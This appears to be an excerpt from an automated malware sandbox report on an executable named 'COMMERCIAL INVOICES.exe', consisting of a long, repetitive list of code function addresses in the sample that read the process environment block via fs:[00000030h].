            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E53E mov eax, dword ptr fs:[00000030h]4_2_0126E53E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E53E mov eax, dword ptr fs:[00000030h]4_2_0126E53E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E53E mov eax, dword ptr fs:[00000030h]4_2_0126E53E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D6500 mov eax, dword ptr fs:[00000030h]4_2_012D6500
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01314500 mov eax, dword ptr fs:[00000030h]4_2_01314500
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01314500 mov eax, dword ptr fs:[00000030h]4_2_01314500
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01314500 mov eax, dword ptr fs:[00000030h]4_2_01314500
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01314500 mov eax, dword ptr fs:[00000030h]4_2_01314500
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01314500 mov eax, dword ptr fs:[00000030h]4_2_01314500
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01314500 mov eax, dword ptr fs:[00000030h]4_2_01314500
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01314500 mov eax, dword ptr fs:[00000030h]4_2_01314500
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127656A mov eax, dword ptr fs:[00000030h]4_2_0127656A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127656A mov eax, dword ptr fs:[00000030h]4_2_0127656A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127656A mov eax, dword ptr fs:[00000030h]4_2_0127656A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01248550 mov eax, dword ptr fs:[00000030h]4_2_01248550
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01248550 mov eax, dword ptr fs:[00000030h]4_2_01248550
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C05A7 mov eax, dword ptr fs:[00000030h]4_2_012C05A7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C05A7 mov eax, dword ptr fs:[00000030h]4_2_012C05A7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C05A7 mov eax, dword ptr fs:[00000030h]4_2_012C05A7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012645B1 mov eax, dword ptr fs:[00000030h]4_2_012645B1
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012645B1 mov eax, dword ptr fs:[00000030h]4_2_012645B1
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01242582 mov eax, dword ptr fs:[00000030h]4_2_01242582
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01242582 mov ecx, dword ptr fs:[00000030h]4_2_01242582
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01274588 mov eax, dword ptr fs:[00000030h]4_2_01274588
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E59C mov eax, dword ptr fs:[00000030h]4_2_0127E59C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E5E7 mov eax, dword ptr fs:[00000030h]4_2_0126E5E7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E5E7 mov eax, dword ptr fs:[00000030h]4_2_0126E5E7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E5E7 mov eax, dword ptr fs:[00000030h]4_2_0126E5E7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E5E7 mov eax, dword ptr fs:[00000030h]4_2_0126E5E7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E5E7 mov eax, dword ptr fs:[00000030h]4_2_0126E5E7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E5E7 mov eax, dword ptr fs:[00000030h]4_2_0126E5E7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E5E7 mov eax, dword ptr fs:[00000030h]4_2_0126E5E7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E5E7 mov eax, dword ptr fs:[00000030h]4_2_0126E5E7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012425E0 mov eax, dword ptr fs:[00000030h]4_2_012425E0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127C5ED mov eax, dword ptr fs:[00000030h]4_2_0127C5ED
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127C5ED mov eax, dword ptr fs:[00000030h]4_2_0127C5ED
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E5CF mov eax, dword ptr fs:[00000030h]4_2_0127E5CF
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E5CF mov eax, dword ptr fs:[00000030h]4_2_0127E5CF
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012465D0 mov eax, dword ptr fs:[00000030h]4_2_012465D0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127A5D0 mov eax, dword ptr fs:[00000030h]4_2_0127A5D0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127A5D0 mov eax, dword ptr fs:[00000030h]4_2_0127A5D0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123E420 mov eax, dword ptr fs:[00000030h]4_2_0123E420
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123E420 mov eax, dword ptr fs:[00000030h]4_2_0123E420
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123E420 mov eax, dword ptr fs:[00000030h]4_2_0123E420
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123C427 mov eax, dword ptr fs:[00000030h]4_2_0123C427
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C6420 mov eax, dword ptr fs:[00000030h]4_2_012C6420
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C6420 mov eax, dword ptr fs:[00000030h]4_2_012C6420
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C6420 mov eax, dword ptr fs:[00000030h]4_2_012C6420
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C6420 mov eax, dword ptr fs:[00000030h]4_2_012C6420
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C6420 mov eax, dword ptr fs:[00000030h]4_2_012C6420
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C6420 mov eax, dword ptr fs:[00000030h]4_2_012C6420
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C6420 mov eax, dword ptr fs:[00000030h]4_2_012C6420
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127A430 mov eax, dword ptr fs:[00000030h]4_2_0127A430
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01278402 mov eax, dword ptr fs:[00000030h]4_2_01278402
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01278402 mov eax, dword ptr fs:[00000030h]4_2_01278402
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01278402 mov eax, dword ptr fs:[00000030h]4_2_01278402
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012CC460 mov ecx, dword ptr fs:[00000030h]4_2_012CC460
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126A470 mov eax, dword ptr fs:[00000030h]4_2_0126A470
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126A470 mov eax, dword ptr fs:[00000030h]4_2_0126A470
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126A470 mov eax, dword ptr fs:[00000030h]4_2_0126A470
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E443 mov eax, dword ptr fs:[00000030h]4_2_0127E443
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E443 mov eax, dword ptr fs:[00000030h]4_2_0127E443
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E443 mov eax, dword ptr fs:[00000030h]4_2_0127E443
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E443 mov eax, dword ptr fs:[00000030h]4_2_0127E443
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E443 mov eax, dword ptr fs:[00000030h]4_2_0127E443
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E443 mov eax, dword ptr fs:[00000030h]4_2_0127E443
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E443 mov eax, dword ptr fs:[00000030h]4_2_0127E443
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E443 mov eax, dword ptr fs:[00000030h]4_2_0127E443
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012FA456 mov eax, dword ptr fs:[00000030h]4_2_012FA456
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126245A mov eax, dword ptr fs:[00000030h]4_2_0126245A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123645D mov eax, dword ptr fs:[00000030h]4_2_0123645D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012464AB mov eax, dword ptr fs:[00000030h]4_2_012464AB
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012744B0 mov ecx, dword ptr fs:[00000030h]4_2_012744B0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012CA4B0 mov eax, dword ptr fs:[00000030h]4_2_012CA4B0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012FA49A mov eax, dword ptr fs:[00000030h]4_2_012FA49A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012404E5 mov ecx, dword ptr fs:[00000030h]4_2_012404E5
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127C720 mov eax, dword ptr fs:[00000030h]4_2_0127C720
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127C720 mov eax, dword ptr fs:[00000030h]4_2_0127C720
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BC730 mov eax, dword ptr fs:[00000030h]4_2_012BC730
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127273C mov eax, dword ptr fs:[00000030h]4_2_0127273C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127273C mov ecx, dword ptr fs:[00000030h]4_2_0127273C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127273C mov eax, dword ptr fs:[00000030h]4_2_0127273C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127C700 mov eax, dword ptr fs:[00000030h]4_2_0127C700
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01240710 mov eax, dword ptr fs:[00000030h]4_2_01240710
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01270710 mov eax, dword ptr fs:[00000030h]4_2_01270710
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01248770 mov eax, dword ptr fs:[00000030h]4_2_01248770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127674D mov esi, dword ptr fs:[00000030h]4_2_0127674D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127674D mov eax, dword ptr fs:[00000030h]4_2_0127674D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127674D mov eax, dword ptr fs:[00000030h]4_2_0127674D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012CE75D mov eax, dword ptr fs:[00000030h]4_2_012CE75D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01240750 mov eax, dword ptr fs:[00000030h]4_2_01240750
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282750 mov eax, dword ptr fs:[00000030h]4_2_01282750
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282750 mov eax, dword ptr fs:[00000030h]4_2_01282750
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C4755 mov eax, dword ptr fs:[00000030h]4_2_012C4755
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012407AF mov eax, dword ptr fs:[00000030h]4_2_012407AF
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F47A0 mov eax, dword ptr fs:[00000030h]4_2_012F47A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E678E mov eax, dword ptr fs:[00000030h]4_2_012E678E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012627ED mov eax, dword ptr fs:[00000030h]4_2_012627ED
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012627ED mov eax, dword ptr fs:[00000030h]4_2_012627ED
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012627ED mov eax, dword ptr fs:[00000030h]4_2_012627ED
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012CE7E1 mov eax, dword ptr fs:[00000030h]4_2_012CE7E1
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012447FB mov eax, dword ptr fs:[00000030h]4_2_012447FB
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012447FB mov eax, dword ptr fs:[00000030h]4_2_012447FB
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124C7C0 mov eax, dword ptr fs:[00000030h]4_2_0124C7C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C07C3 mov eax, dword ptr fs:[00000030h]4_2_012C07C3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125E627 mov eax, dword ptr fs:[00000030h]4_2_0125E627
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01276620 mov eax, dword ptr fs:[00000030h]4_2_01276620
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01278620 mov eax, dword ptr fs:[00000030h]4_2_01278620
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124262C mov eax, dword ptr fs:[00000030h]4_2_0124262C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BE609 mov eax, dword ptr fs:[00000030h]4_2_012BE609
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125260B mov eax, dword ptr fs:[00000030h]4_2_0125260B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125260B mov eax, dword ptr fs:[00000030h]4_2_0125260B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125260B mov eax, dword ptr fs:[00000030h]4_2_0125260B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125260B mov eax, dword ptr fs:[00000030h]4_2_0125260B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125260B mov eax, dword ptr fs:[00000030h]4_2_0125260B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125260B mov eax, dword ptr fs:[00000030h]4_2_0125260B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125260B mov eax, dword ptr fs:[00000030h]4_2_0125260B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282619 mov eax, dword ptr fs:[00000030h]4_2_01282619
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127A660 mov eax, dword ptr fs:[00000030h]4_2_0127A660
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127A660 mov eax, dword ptr fs:[00000030h]4_2_0127A660
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01272674 mov eax, dword ptr fs:[00000030h]4_2_01272674
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130866E mov eax, dword ptr fs:[00000030h]4_2_0130866E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130866E mov eax, dword ptr fs:[00000030h]4_2_0130866E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125C640 mov eax, dword ptr fs:[00000030h]4_2_0125C640
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127C6A6 mov eax, dword ptr fs:[00000030h]4_2_0127C6A6
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012766B0 mov eax, dword ptr fs:[00000030h]4_2_012766B0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01244690 mov eax, dword ptr fs:[00000030h]4_2_01244690
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01244690 mov eax, dword ptr fs:[00000030h]4_2_01244690
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BE6F2 mov eax, dword ptr fs:[00000030h]4_2_012BE6F2
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BE6F2 mov eax, dword ptr fs:[00000030h]4_2_012BE6F2
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BE6F2 mov eax, dword ptr fs:[00000030h]4_2_012BE6F2
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BE6F2 mov eax, dword ptr fs:[00000030h]4_2_012BE6F2
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C06F1 mov eax, dword ptr fs:[00000030h]4_2_012C06F1
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C06F1 mov eax, dword ptr fs:[00000030h]4_2_012C06F1
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0127A6C7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127A6C7 mov eax, dword ptr fs:[00000030h]4_2_0127A6C7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C892A mov eax, dword ptr fs:[00000030h]4_2_012C892A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D892B mov eax, dword ptr fs:[00000030h]4_2_012D892B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BE908 mov eax, dword ptr fs:[00000030h]4_2_012BE908
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BE908 mov eax, dword ptr fs:[00000030h]4_2_012BE908
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01238918 mov eax, dword ptr fs:[00000030h]4_2_01238918
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01238918 mov eax, dword ptr fs:[00000030h]4_2_01238918
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012CC912 mov eax, dword ptr fs:[00000030h]4_2_012CC912
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01266962 mov eax, dword ptr fs:[00000030h]4_2_01266962
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01266962 mov eax, dword ptr fs:[00000030h]4_2_01266962
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01266962 mov eax, dword ptr fs:[00000030h]4_2_01266962
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0128096E mov eax, dword ptr fs:[00000030h]4_2_0128096E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0128096E mov edx, dword ptr fs:[00000030h]4_2_0128096E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0128096E mov eax, dword ptr fs:[00000030h]4_2_0128096E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012CC97C mov eax, dword ptr fs:[00000030h]4_2_012CC97C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E4978 mov eax, dword ptr fs:[00000030h]4_2_012E4978
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E4978 mov eax, dword ptr fs:[00000030h]4_2_012E4978
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C0946 mov eax, dword ptr fs:[00000030h]4_2_012C0946
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01314940 mov eax, dword ptr fs:[00000030h]4_2_01314940
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h]4_2_012529A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h]4_2_012529A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h]4_2_012529A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h]4_2_012529A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h]4_2_012529A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h]4_2_012529A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h]4_2_012529A0
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012409AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012C89B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012C89B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012CE9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012729F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0130A9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012D69C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0124A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012749D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01262835 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01262835 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01262835 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012E483A mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0127A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012CC810 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012D6870 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012CE872 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01252840 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01270854 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01244859 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_01240887 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012CC89D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0130A8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0127C8F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0126E8C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_013108C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0126EB20 mov eax, dword ptr fs:[00000030h] (2 occurrences)
